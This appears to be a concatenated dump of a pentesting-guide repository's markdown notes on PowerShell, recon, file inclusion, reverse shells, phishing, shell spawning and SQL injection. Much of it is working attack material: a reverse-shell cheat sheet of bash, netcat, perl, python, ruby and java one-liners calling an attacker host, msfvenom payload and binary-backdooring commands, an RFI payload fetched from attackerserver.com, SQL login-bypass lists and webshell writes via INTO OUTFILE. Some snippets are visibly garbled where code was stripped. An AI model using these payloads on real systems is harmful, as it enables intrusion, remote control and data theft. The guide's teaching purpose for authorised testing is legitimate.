be used like grep 77 | get-command | select-string blabla 78 | ``` 79 | 80 | **General commands that can be used on objects** 81 | 82 | ``` 83 | measure-object -words 84 | get-content fil.txt | measure-object words 85 | ``` 86 | 87 | ### Working with filesystem 88 | 89 | **List all files in current directory** 90 | 91 | ``` 92 | get-childitem 93 | gci 94 | 95 | List hidden files too 96 | gci -Force 97 | 98 | List all files recurisvely 99 | gci -rec 100 | 101 | Count the files 102 | (get-childitem).count 103 | List all files but exclude some folders 104 | gci -exclude AppData | gci -rec -force 105 | ``` 106 | 107 | ### Working with files 108 | 109 | ``` 110 | Read a file 111 | Get-Content 112 | gc 113 | cat 114 | Count lines of file 115 | (get-content .\file).count 116 | Select specific line in a file (remember that it starts from 0) 117 | (gc .\file.txt)[10] 118 | gc .\file.txt | Select -index 10 119 | ``` 120 | 121 | ### Services 122 | 123 | ``` 124 | List services 125 | get-service 126 | ``` 127 | 128 | ### Network related stuff 129 | 130 | Domain information 131 | 132 | ``` 133 | Get-ADDomain 134 | Get-AdDomainController 135 | Get-AdComputer 136 | To see a list of all properties do this 137 | get-adcomputer ComputerName -prop * 138 | 139 | Get AD Users 140 | Get-ADUser -f {Name -eq 'Karl, Martinez'} -properties * 141 | 142 | Get all AD Groups 143 | Get-ADGroup -filter * 144 | 145 | 146 | 147 | Resolve DNS 148 | Resolve-DNSname 10.10.10.10 149 | 150 | ``` 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /powershell_scripting2.md: -------------------------------------------------------------------------------- 1 | # Powershell scripting 2 | 3 | 4 | ## Variables 5 | 6 | Variables are declared like this 7 | 8 | ```powershell 9 | $test = "something" 10 | ``` 11 | 12 | ## Execute scripts 13 | 14 | So for security reasons the default policy for executing scripts is **Restricted**. Here are the different script-policies. 15 | 16 | 17 | **Restricted**: PowerShell won't run any scripts. This is PowerShell's default execution policy. 18 | 19 | **AllSigned**: PowerShell will only run scripts that are signed with a digital signature. If you run a script signed by a publisher PowerShell hasn't seen before, PowerShell will ask whether you trust the script's publisher. 20 | 21 | **RemoteSigned**: PowerShell won't run scripts downloaded from the Internet unless they have a digital signature, but scripts not downloaded from the Internet will run without prompting. If a script has a digital signature, PowerShell will prompt you before it runs a script from a publisher it hasn't seen before. 22 | 23 | **Unrestricted**: PowerShell ignores digital signatures but will still prompt you before running a script downloaded from the Internet. 24 | 25 | 26 | Source: http://windowsitpro.com/powershell/running-powershell-scripts-easy-1-2-3 27 | 28 | So if we want to run script `myscript.ps1` we have to set the execution-policy. 29 | First let's check what execution-policy we currently have: 30 | 31 | ```powershell 32 | Get-ExecutionPolicy 33 | ``` 34 | 35 | Then we can set the execution policy like this 36 | 37 | ```powershell 38 | set-ExecutionPolicy unrestricted 39 | ``` 40 | 41 | ## References 42 | https://github.com/samratashok/nishang 43 | https://www.youtube.com/watch?v=czJrXiLs0wM 44 | -------------------------------------------------------------------------------- /privilege-escalation-powershell.md: -------------------------------------------------------------------------------- 1 | ## Privilege Escalation with Powershell 2 | 3 | 4 | 5 | ``` 6 | What modules are available to us? 7 | get-module -listavailable 8 | ``` 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /python_fundamentals.md: -------------------------------------------------------------------------------- 1 | # Python fundamentals 2 | 3 | ## Array/list 4 | 5 | ```python 6 | my_list = [1,"string",3,4,5] 7 | for item in my_list: 8 | print item 9 | 10 | # Append/push to list 11 | my_list.append("addMe") 12 | ``` 13 | 14 | 15 | ## Modules 16 | 17 | Always good to modular your code. 18 | 19 | **module1.py** 20 | 21 | ```python 22 | 23 | def addNumbers(numberOne, numberTwo): 24 | return numberOne + numberTwo 25 | ``` 26 | 27 | **script.py** 28 | 29 | ```python 30 | import module1 31 | 32 | total = module1.addNumbers(1,2) 33 | print total 34 | ``` 35 | 36 | 37 | ## Pip - package management 38 | 39 | Pip is the python package manager. It ca be used to download other modules. 40 | 41 | Install pip 42 | 43 | ```bash 44 | sudo apt-get install python-pip 45 | ``` 46 | 47 | 48 | To install package 49 | 50 | ```bash 51 | pip install package 52 | ``` -------------------------------------------------------------------------------- /random-stuff.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/random-stuff.md -------------------------------------------------------------------------------- /recon-ng.md: -------------------------------------------------------------------------------- 1 | # recon-ng 2 | Recon-ng is a recognissance-tool that can be used to enumerate subdomains and many other things. 3 | 4 | 1. Create a workspace 5 | - We should first start a new workspace. FOr the project we are working on. 6 | 7 | `workspace add test.com` 8 | 9 | Now we can start using modules, with the `use` command. 10 | 11 | It follows this pattern, using outcomplete. 12 | 13 | `use recon/domains-contacts/pgp_search` 14 | 15 | Then we can look at the options. 16 | 17 | `show options` 18 | 19 | Then set the options 20 | 21 | `set source test.com` 22 | 23 | If you have already set a workspace the source default will be test.com 24 | 25 | To run the module we just run 26 | `run` 27 | 28 | Then the hosts, or contacts table might be updated. Depending on what is found. We can see what is updated by looking at the dashboard. 29 | 30 | `show dashboard` 31 | 32 | Then: 33 | 34 | `show hosts` -------------------------------------------------------------------------------- /remote_file_inclusion.md: -------------------------------------------------------------------------------- 1 | # Remote File Inclusion 2 | 3 | Remote file inclusion uses pretty much the same vector as local file inclusion. 4 | 5 | A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even though it is not even hosted on that machine. 6 | 7 | RFI's are less common than LFI. Because in order to get them to work the developer must have edited the `php.ini` configuration file. 8 | 9 | This is how they work. 10 | 11 | So you have an unsanitized parameter, like this 12 | 13 | ``` 14 | $incfile = $_REQUEST["file"]; 15 | include($incfile.".php"); 16 | ``` 17 | 18 | Now what you can do is to include a file that is not hosted on the victim-server, but instead on the attackers server. 19 | 20 | ``` 21 | http://exampe.com/index.php?page=http://attackerserver.com/evil.txt 22 | ``` 23 | 24 | And evil.txt will look like something like this: 25 | 26 | ``` 27 | 28 | 29 | # Or just get a reverse shell directly like this: 30 | /dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?> 31 | 32 | ``` 33 | 34 | So when the victim-server includes this file it will automatically execute the commands that are in the evil.txt file. And we have a RCE. 35 | 36 | 37 | ## Avoid extentions 38 | 39 | Remember to add the nullbyte `%00` to avoid appending `.php`. This will only work on php before version 5.3. 40 | 41 | If it does not work you can also add a `?`, this way the rest will be interpreted as url parameters. -------------------------------------------------------------------------------- /reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse-shells 2 | 3 | This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: 4 | [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) 5 | 6 | [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 7 | 8 | ## Msfvenom 9 | 10 | There is an important difference between non-staged and staged payload. A **non-staged** shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat. 11 | 12 | **staged** shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat. 13 | 14 | ### Windows 15 | 16 | #### Meterpreter 17 | 18 | **Standard meterpreter** 19 | 20 | ``` 21 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe 22 | ``` 23 | 24 | ``` 25 | use exploit/multi/handler 26 | set payload windows/meterpreter/reverse_tcp 27 | ``` 28 | 29 | **Meterpreter HTTPS** 30 | 31 | It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections. 32 | 33 | ``` 34 | msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe 35 | ``` 36 | 37 | #### Non-staged payload 38 | 39 | ``` 40 | msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe 41 | ``` 42 | 43 | ``` 44 | use exploit/multi/handler 45 | set payload windows/shell_reverse_tcp 46 | ``` 47 | 48 | #### Staged payload 49 | 50 | ``` 51 | msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe 52 | ``` 53 | 54 | This must be caught with metasploit. It does not work with netcat. 55 | 56 | ``` 57 | use exploit/multi/handler 58 | set payload windows/shell/reverse_tcp 59 | ``` 60 | 61 | ### Inject payload into binary 62 | 63 | ``` 64 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe 65 | ``` 66 | 67 | ## Linux 68 | 69 | ### Binary 70 | 71 | ``` 72 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf 73 | ``` 74 | 75 | ### Bash 76 | 77 | ``` 78 | 0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196 79 | ``` 80 | 81 | ``` 82 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 83 | ``` 84 | 85 | ### Php 86 | 87 | ``` 88 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' 89 | ``` 90 | 91 | ### Netcat 92 | 93 | **Bind shell** 94 | 95 | ``` 96 | #Linux 97 | nc -vlp 5555 -e /bin/bash 98 | nc 192.168.1.101 5555 99 | 100 | # Windows 101 | nc.exe -nlvp 4444 -e cmd.exe 102 | ``` 103 | 104 | **Reverse shell** 105 | 106 | ``` 107 | # Linux 108 | nc -lvp 5555 109 | nc 192.168.1.101 5555 -e /bin/bash 110 | 111 | # Windows 112 | nc -lvp 443 113 | nc.exe 192.168.1.101 443 -e cmd.exe 114 | ``` 115 | 116 | **With -e flag** 117 | 118 | ``` 119 | nc -e /bin/sh ATTACKING-IP 80 120 | ``` 121 | 122 | ``` 123 | /bin/sh | nc ATTACKING-IP 80 124 | ``` 125 | 126 | **Without -e flag** 127 | 128 | ``` 129 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p 130 | 131 | ``` 132 | 133 | Upgrade Netcat shell to an interactive: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ 134 | 135 | ### Ncat 136 | 137 | Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted. 138 | 139 | Bind 140 | 141 | ``` 142 | ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl 143 | ncat -v 192.168.1.103 5555 --ssl 144 | ``` 145 | 146 | ### Telnet 147 | 148 | ``` 149 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p 150 | ``` 151 | 152 | ``` 153 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 154 | ``` 155 | 156 | ### Perl 157 | 158 | ``` 159 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 160 | ``` 161 | 162 | ### Ruby 163 | 164 | ``` 165 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 166 | ``` 167 | 168 | ### Java 169 | 170 | ``` 171 | r = Runtime.getRuntime() 172 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 173 | p.waitFor() 174 | ``` 175 | 176 | ### Python 177 | 178 | ``` 179 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 180 | ``` 181 | 182 | ## Web-shells - Platform Independent 183 | 184 | ### PHP 185 | 186 | This php-shell is OS-independent. You can use it on both Linux and Windows. 187 | 188 | ``` 189 | msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php 190 | ``` 191 | 192 | ### ASP 193 | 194 | ``` 195 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp 196 | ``` 197 | 198 | ### WAR 199 | 200 | ``` 201 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war 202 | ``` 203 | 204 | ### JSP 205 | 206 | ``` 207 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp 208 | ``` 209 | 210 | 211 | 212 | -------------------------------------------------------------------------------- /scanning.md: -------------------------------------------------------------------------------- 1 | # Recon and Information Gathering Phase 2 | 3 | So once you have decided on a target you want to start your recon-process. 4 | 5 | The recon-phase is usually divided up into two phases. 6 | 7 | 1. Passive information gathering / OSINT 8 | This is when you check out stuff like: 9 | - Web information 10 | - Email Harvesting 11 | - Whois enumeration 12 | 13 | 2. Active information gathering 14 | 15 | This is when you start scanning the target with your different tools. 16 | 17 | -------------------------------------------------------------------------------- /scripting_with_python.md: -------------------------------------------------------------------------------- 1 | # Scripting With Python 2 | 3 | There are many high-level scripting languages that are easy to use. One really popular one is Python. 4 | 5 | 6 | -------------------------------------------------------------------------------- /server-side-vulnerabilities.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/server-side-vulnerabilities.md -------------------------------------------------------------------------------- /session-fixation.md: -------------------------------------------------------------------------------- 1 | ## Session Fixation 2 | 3 | 4 | 5 | Session fixation is a pretty small but common vulnerability. 6 | 7 | A common way to handle the fact that HTTP is a stateless protocol is you store cookies in the users browser, and then have that cookie send to the web server on each subsequent request. This way the web server can know that the user has visited the website before. So when a user logs in to a web application a cookie for that session is usually created, in order for the web-server to know that the session is active. 8 | 9 | Session fixation happens when the session-identifier \(in this case the cookie\) is setbefore the user has authenticated itself \(which is usually done with a simple username/password login\), and then not changed when the user authenticates itself. 10 | 11 | For example, let's say you want to log in to a web application. When you first visit the site the following cookie is set: 12 | 13 | ``` 14 | SessionID=123ad76dab97b23ba8d76a 15 | ``` 16 | 17 | You then authenticate with your username and password and make a successful login. But the SessionID-cookie does not change. Then you have a session fixation vulnerability on your hands. Because this means that if an attacker can set the SessionID-cookie to a value the attacker knows it will then know the SessionID-cookie once the user actually authenticates. 18 | 19 | ### How to set the cookie? 20 | 21 | **In GET request** - if the session-token is sent in the URL of a GET-request the attacker can simply send a link which contains the attacker-controlled session-token. 22 | 23 | **XSS** - If the attacker has also found a XSS vulnerability she can use it to set the cookie. This can of course be mitigated by setting the HttpOnly attribute to the cookie. 24 | 25 | **META-tag** - If the attacker has the ability to inject html-code she can use the META-tag to set the cookie. 26 | 27 | ``` 28 | http://website.kon/ 29 | ``` 30 | 31 | **MITM** - By being MITM the attacker can set the cookie. 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /setuid_c-code.md: -------------------------------------------------------------------------------- 1 | # Setuid c-code 2 | 3 | 4 | 5 | Sometimes you need setuid code. Here is a great snippet for it. 6 | 7 | https://gist.github.com/jblyberg/3899599 8 | 9 | ``` 10 | #include 11 | #include 12 | 13 | main( int argc, char ** argv, char ** envp ) 14 | { 15 | if( setgid(getegid()) ) perror( "setgid" ); 16 | if( setuid(geteuid()) ) perror( "setuid" ); 17 | envp = 0; /* blocks IFS attack on non-bash shells */ 18 | system( "/path/to/bash/script", argv, envp ); 19 | perror( argv[0] ); 20 | return errno; 21 | } 22 | ``` -------------------------------------------------------------------------------- /smtp-user-enum.md: -------------------------------------------------------------------------------- 1 | # smtp-user-enum 2 | 3 | You can find more about this is Server-site-vulnerabilities/List of common ports/Port 25 4 | https://bobloblaw.gitbooks.io/security/content/list_of_common_ports.html 5 | -------------------------------------------------------------------------------- /social_engineering_-_phishing.md: -------------------------------------------------------------------------------- 1 | # Social Engineering - Phishing 2 | 3 | Gaining initial access to a network is often done using different kinds of social engineering attacks. 4 | 5 | ## Auto-download a malicious file 6 | 7 | The techical part is not really that difficult here. In order to auto-download a file you just add this script to the malicious webpage 8 | 9 | ``` 10 | 11 | ``` 12 | 13 | Another way to do it is like this 14 | 15 | ``` 16 | 17 | 18 | 19 | 20 | 21 | ``` 22 | 23 | Of course the user will have to accept to download the file, unless the user has previously checked in the box automatically download. The user must then click the file for it to execute. This is where the social engineering part comes in, you really must trick the user into executing the file. 24 | 25 | ### Change the filename 26 | 27 | Since windows by default remove the filename you can call your file shell.jpg.exe, and once downloaded onto the machine windows will display it as "shell.jpg". 28 | 29 | ### Embed malicious code in legitimate file 30 | 31 | It is however very likely that this will be picked up by a antivirus. 32 | 33 | ``` 34 | msfvenom -a x86 --platform windows -x nc.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lhost=53 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o ncMalicious.exe 35 | ``` 36 | 37 | ## Autodownload a malicious javascript-file 38 | 39 | Just like we can download an exe for a user to can also make that user download a javascript file. Since javascript files can execute commands on windows. 40 | 41 | ``` 42 | var oShell = new ActiveXObject("Shell.Application"); 43 | var commandtoRun = "C:\\Windows\\system32\\calc.exe"; 44 | oShell.ShellExecute(commandtoRun,"","","open","1"); 45 | ``` 46 | 47 | ``` 48 | http://evilsite.com/file.js 49 | ``` 50 | 51 | This code can be modified to greate a wget-script and then download and execute a script. 52 | 53 | 54 | ## Phishing 55 | 56 | The most common tool for social engineering is to use Social Engineering Toolkit. SET. It comes as default in Kali. Run it like this: 57 | 58 | 59 | ``` 60 | setoolkit 61 | ``` 62 | 63 | ## Spear phishing 64 | 65 | ## Word/excel makros 66 | 67 | An explanation of how to createa malicious makro-wordfile. 68 | 69 | https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/ 70 | 71 | ## Embed a executable inside a PowerPoint 72 | 73 | You can embed executables inside PowerPoint presentations and then have them execute about animations. 74 | 75 | ## Reference: 76 | https://www.youtube.com/watch?v=NTdthBQYa1k -------------------------------------------------------------------------------- /spawning_shells.md: -------------------------------------------------------------------------------- 1 | # Spawning shells 2 | 3 | 4 | 5 | ## Non-interactive tty-shell 6 | 7 | If you have a non-tty-shell there are certain commands and stuff you can't do. This can happen if you upload reverse shells on a webserver, so that the shell you get is by the user www-data, or similar. These users are not meant to have shells as they don't interact with the system has humans do. 8 | 9 | So if you don't have a tty-shell you can't run `su`, `sudo` for example. This can be annoying if you manage to get a root password but you can't use it. 10 | 11 | Anyways, if you get one of these shells you can upgrade it to a tty-shell using the following methods: 12 | 13 | 14 | 15 | **Using python** 16 | 17 | ``` 18 | python -c 'import pty; pty.spawn("/bin/sh")' 19 | ``` 20 | 21 | **Echo** 22 | 23 | ``` 24 | echo 'os.system('/bin/bash')' 25 | ``` 26 | 27 | **sh** 28 | 29 | ``` 30 | /bin/sh -i 31 | ``` 32 | 33 | **bash** 34 | 35 | ``` 36 | /bin/bash -i 37 | ``` 38 | 39 | **Perl** 40 | 41 | ``` 42 | perl -e 'exec "/bin/sh";' 43 | ``` 44 | 45 | **From within VI** 46 | 47 | ``` 48 | :!bash 49 | ``` 50 | 51 | ## Interactive tty-shell 52 | 53 | So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell. You won't be able to use the up and down arrows, you won't have tab-completion. This might be really frustrating if you stay in that shell for long. It can also be more risky, if a execution gets stuck you cant use Ctr-C or Ctr-Z without killing your session. However that can be fixed using socat. Follow these instructions. 54 | 55 | https://github.com/cornerpirate/socat-shell 56 | 57 | ## References: 58 | 59 | http://unix.stackexchange.com/questions/122616/why-do-i-need-a-tty-to-run-sudo-if-i-can-sudo-without-a-password 60 | http://netsec.ws/?p=337 61 | http://pentestmonkey.net/blog/post-exploitation-without-a-tty 62 | -------------------------------------------------------------------------------- /sql-injections.md: -------------------------------------------------------------------------------- 1 | # SQL-injections 2 | 3 | ## Tldr 4 | 5 | ``` 6 | # Post 7 | ./sqlmap.py -r request.txt -p username 8 | 9 | # Get 10 | sqlmap -u "http://192.168.1.101/index.php?id=1" --dbms=mysql 11 | 12 | # Crawl 13 | sqlmap -u http://192.168.1.101 --dbms=mysql --crawl=3 14 | ``` 15 | 16 | ## How does sql-injections work? 17 | 18 | So we have a website that is written in php. We have a login functionality, where the code looks like this: 19 | 20 | ```php 21 | mysql_connect("localhost", "pelle", "mySecretPassowrd") or die(mysql_error()); 22 | 23 | mysql_select_db("myHomepage"); 24 | 25 | if ($_POST['uname'] != ""){ 26 | $username = $_POST['username']; 27 | $password = $_POST['password']; 28 | $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'"; 29 | $result = mysql_query($query); 30 | $row = mysql_fetch_array($result); 31 | } 32 | ``` 33 | 34 | So the user input is not filtered or sanitized in any way. Which means that what the users puts in in the login-form will be executed my mysql. So just like in xss-injections we just try to escape the input field to be able to execute sql-commands. So if we input the following into the user-field and password-field in the login: 35 | 36 | ``` 37 | whatever' or '1'='1 38 | whatever' or '1'='1 39 | ``` 40 | 41 | The query will look like this: 42 | 43 | ``` 44 | $query = "SELECT * FROM users WHERE username = 'whatever' OR '1'='1' AND password='whatever' OR '1'='1'"; 45 | ``` 46 | 47 | Since they both become true the database will retrieve all users and we will be able to bypass the login. 48 | 49 | If you know the username you could of course use that and then only inject on the password parameter. 50 | 51 | ``` 52 | $query = "SELECT * FROM users WHERE username = 'admin' AND password='whatever' OR '1'='1'"; 53 | ``` 54 | 55 | 56 | 57 | ## SQLmap 58 | 59 | Sqlmap is a great tool to perform sql-injections. 60 | Here is the manual. 61 | https://github.com/sqlmapproject/sqlmap/wiki/Usage 62 | 63 | ### Using sqlmap with login-page 64 | 65 | So you need to authenticate before you can access the vulnerable paramter. 66 | 67 | You just cature the request using burp suite, and save the requiest in a file. Then your run 68 | 69 | ``` 70 | sqlmap -r request.txt 71 | ``` 72 | 73 | Since the cookie is saved in the reuqest sqlmap can do it. 74 | 75 | ### Crawl a page to find sql-injections 76 | 77 | ``` 78 | sqlmap -u http://example.com --crawl=1 79 | ``` 80 | 81 | ### Dumping a database or table 82 | 83 | Here we are dumping the database Webapp and the table Users. 84 | 85 | ``` 86 | sqlmap -r request.txt -p username --dbms=mysql --dump -D Webapp -T Users 87 | ``` 88 | 89 | ### Use proxy 90 | 91 | ``` 92 | --proxy="http://192.2.2.2.2:1111" 93 | ``` 94 | 95 | **Proxy credencials** 96 | 97 | ``` 98 | --proxy-cred="username:password" 99 | ``` 100 | 101 | 102 | 103 | ## Login bypass 104 | 105 | 106 | This is the most classic, standard first test: 107 | ``` 108 | ' or '1'='1 109 | ``` 110 | 111 | Then you have: 112 | 113 | ``` 114 | -' 115 | ' ' 116 | '&' 117 | '^' 118 | '*' 119 | ' or ''-' 120 | ' or '' ' 121 | ' or ''&' 122 | ' or ''^' 123 | ' or ''*' 124 | "-" 125 | " " 126 | "&" 127 | "^" 128 | "*" 129 | " or ""-" 130 | " or "" " 131 | " or ""&" 132 | " or ""^" 133 | " or ""*" 134 | or true-- 135 | " or true-- 136 | ' or true-- 137 | ") or true-- 138 | ') or true-- 139 | ' or 'x'='x 140 | ') or ('x')=('x 141 | ')) or (('x'))=(('x 142 | " or "x"="x 143 | ") or ("x")=("x 144 | ")) or (("x"))=(("x 145 | ``` 146 | 147 | ## Sql-injections manually 148 | 149 | Sqlmap is good, but it is not very stealthy. And it can generate a lot of traffic. And also it is good to understand the vulnerability in the cote and not just run tools. So let's learn sql-injections the manual way. 150 | 151 | The two main ways for perform a sql-injection: **error based** or **blind**. 152 | 153 | ### Error-bases DB enumeration 154 | 155 | If we manage to find an error-message after a broken sql-query, we can use that to try to map out the database structure. 156 | 157 | For example, if we have a url that end with 158 | 159 | ``` 160 | http://example.com/photoalbum.php?id=1 161 | ``` 162 | 163 | #### Step 1 - Add the tick ' 164 | 165 | So first we should try to break the sql-syntaxt by adding a `'`. 166 | We should first ad a `'` or a `"`. 167 | 168 | ``` 169 | http://example.com/photoalbum.php?id=1' 170 | ``` 171 | 172 | If the page then returns a blank page or a page with a sql-error we know that the page it vulnerable. 173 | 174 | #### Step 2 - Enumerate columns 175 | 176 | So in order to enumerate the columns of a table we can use the **order by** 177 | 178 | **Order by 1** means sort by values of the first column from the result set. 179 | **Order by 2** means sort by values of the second column from the result set. 180 | 181 | So it is basically just a tool to order the data in a table. But we can use it to find out how many columns a table has. Because if we do **order by 10** when there really only is 9 columns sql will throw an error. And we will know how many columns the table has. 182 | 183 | ``` 184 | # This trhows no error 185 | http://example.com/photoalbum.php?id=1 order by 9 186 | # This throws error 187 | http://example.com/photoalbum.php?id=1 order by 10 188 | ``` 189 | 190 | So you just increase the number (or do a binary tree search if you want tot do it a bit faster) until you get an error, and you know how many columns the table has. 191 | 192 | #### Step 3 - Find space to output db 193 | 194 | Now we need to know which coolumns are being outputed on the webpage. It could be that not all data from the database is worthwhile to output, so maybe only column 1 and 3 are being outputted to the website. 195 | 196 | To find out which columns are being outputted we can use the **union select** command. So we do the command like this 197 | 198 | ``` 199 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9 200 | ``` 201 | 202 | For all the columns that exists. This will return the numbers of the columns that are being outputted on the website. Take note of which these columns are. 203 | 204 | #### Step 4 - Start enumerating the database 205 | 206 | Now we can use that field to start outputing data. For example if columns number five has been visible in step 3, we can use that to output the data. 207 | 208 | Here is a list of data we can retrieve from the database. Some of the syntaxes may difference depending on the database engine (mysql, mssql, postgres). 209 | 210 | ``` 211 | # Get username of the sql-user 212 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,user(),6,7,8,9 213 | 214 | # Get version 215 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,version(),6,7,8,9 216 | 217 | # Get all tables 218 | 219 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables 220 | 221 | # Get all columns from a specific table 222 | 223 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' 224 | 225 | # Get content from the users-table. From columns name and password. The 0x3a only servers to create a delimitor between name and password 226 | 227 | http://example.com/photoalbum.php?id=1 union select 1,2,3,4,concat(name,0x3a, 228 | password),6,7,8,9 FROM users 229 | ``` 230 | 231 | 232 | 233 | ### Blind sql-injection 234 | 235 | We say that it is blind because we do not have access to the error log. This make the whole process a lot more complicated. But it is of course still possible to exploit. 236 | 237 | #### Using sleep 238 | 239 | Since we do not have access to the logs we do not know if our commands are syntaxically correct or not. To know if it is correct or not we can however use the sleep statement. 240 | 241 | ``` 242 | http://example.com/photoalbum.php?id=1-sleep(4) 243 | ``` 244 | 245 | If it lods for four seconds exta we know that the database is processing our sleep() command. 246 | 247 | 248 | ### Get shell from sql-injection 249 | 250 | The good part about mysql from a hacker-perspective is that you can actaully use slq to write files to the system. The will let us write a backdoor to the system that we can use. 251 | 252 | 253 | #### Load files 254 | 255 | UNION SELECT 1, load_file(/etc/passwd) # 256 | 257 | ``` 258 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' 260 | 261 | ``` 262 | #### Write files 263 | 264 | ``` 265 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' 267 | 268 | http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php' 270 | ``` 271 | 272 | #### MSSQL - xp_cmdshell 273 | 274 | You can run commands straight from the sql-query in MSSQL. 275 | 276 | 277 | ## Truncating Mysql Vulerability 278 | 279 | Basically this happens when you don't validate the length of user input. 280 | Two things are needed for it to work: 281 | 282 | - Mysql does not make comparisons in binary mode. This means that "admin" and "admin " are the same. 283 | 284 | - If the username column in the database has a character-limit the rest of the characters are truncated, that is removed. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed. 285 | 286 | With this information we can create a new admin-user and have our own password set to it. So if the max-length is 20 characters we can insert the following string 287 | 288 | ``` 289 | admin removed 290 | ``` 291 | 292 | This means that the "removed" part will be removed/truncated/deleted. And the trailing spaces will be removed upon insert in the database. So it will effectively be inserted as "admin". 293 | 294 | 295 | 296 | ## References 297 | 298 | http://resources.infosecinstitute.com/sql-truncation-attack/ 299 | http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet 300 | http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/ -------------------------------------------------------------------------------- /ssl-strip.md: -------------------------------------------------------------------------------- 1 | # SSL-strip 2 | 3 | If the user you are intercepting is communicating over HTTPS your interception will trigger an alert very time a user tried to enter a https-page. This is not what we want. In order do bypass this we can remove the ssl-part of every request. It is less likely that the user will notice a change from HTTPS to HTTP in the url-bar. 4 | 5 | 6 | ## Reference 7 | Penteration Testing - A hands on introduction to hacking. Page 174 8 | -------------------------------------------------------------------------------- /styles/ebook.css: -------------------------------------------------------------------------------- 1 | /* CSS for ebook */ 2 | -------------------------------------------------------------------------------- /styles/print.css: -------------------------------------------------------------------------------- 1 | /* CSS for print */ 2 | -------------------------------------------------------------------------------- /styles/website.css: 